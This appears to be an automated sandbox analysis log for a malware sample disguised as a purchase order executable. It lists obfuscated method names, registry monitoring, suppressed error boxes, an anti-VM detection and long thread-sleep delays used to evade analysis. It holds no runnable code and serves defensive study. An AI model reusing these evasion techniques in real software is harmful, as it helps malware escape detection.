Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, sGYLIBRP2UYPvkC8iu.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WHraZ9EUJY', 'n64aiZob5Z', 'D9Aaz4cvov', 'UTjFoPytLF', 'RjBFmtCN41', 'zfbFap0Q4e', 'zxgFFDOt0W', 'EfQfxsJcb6OWPNPihSq'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, Y1x70KpXwX06bg0SJN.cs	High entropy of concatenated method names: 'ToString', 'uvD2pBdY6O', 'lrX2u3PfO4', 'TJP2fdWpyj', 'yv82hCfc9h', 'nJq2M0QZK6', 'pe523OwpAy', 'dY22P8YM4d', 'Ghm2BvZIBo', 'so72RoxdHy'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, S2gI0tJTis4pOlOImq.cs	High entropy of concatenated method names: 'Dispose', 'GHnmZdayLT', 'MJBauUv4OB', 'i9D77uqY2K', 'M4smi9nM1t', 'YftmzwlvxG', 'ProcessDialogKey', 'zNEaobqWC0', 'xndamBaBPa', 'NHdaaTudBH'

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 81E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 77B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 91E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: A1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 2F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Memory allocated: 5080000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599217	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596169	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595835	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595623	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Window / User API: threadDelayed 8494			Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Window / User API: threadDelayed 1357			Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7636	Thread sleep count: 8494 > 30	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7636	Thread sleep count: 1357 > 30	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596169s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595835s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595623s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599217	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596641	Jump to behavior
